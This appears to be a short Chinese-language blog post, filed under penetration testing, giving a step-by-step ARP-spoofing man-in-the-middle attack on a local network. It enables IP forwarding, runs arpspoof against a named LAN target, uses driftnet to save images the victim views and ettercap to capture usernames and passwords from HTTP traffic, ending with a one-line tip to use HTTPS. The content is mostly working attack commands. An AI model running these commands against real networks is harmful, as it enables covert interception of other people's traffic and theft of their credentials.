关于渗透测试 arpspoof 欺骗抓包

作者:ouyang 发布时间:2020年09月06日 阅读: 分类:Linux摘要

首先开启测试终端转发功能,如未开启将会断网1为开启,0为关闭转发功能。

echo 1 > /proc/sys/net/ipv4/ip_forward

执行arpspoof命令

sudo arpspoof -t 192.168.50.138 192.168.50.156 -i eth0  //138为渗透对象,156为测试终端,i为指定网卡

获取渗透对象图片

sudo driftnet -i eth0 -d /home/kali/pic/  //i为指定网卡名称,-d为获取到图片保存地址

获取账号密码

sudo ettercap -Tq -i eth0  //开启后显示获取username与password的字段数据包

关于防范该问题的方法:上SSL证书,开启https即可解决。所以在http协议下切勿输入你重要的密码。

如果您还有什么疑惑或建议,欢迎在下方评论区继续讨论。
如果您觉得本文还不错,欢迎分享/打赏本文。当然,如果你无视它,也不会影响你的阅读。再次表示欢迎和感谢!

标签: 渗透测试, kali

添加新评论 »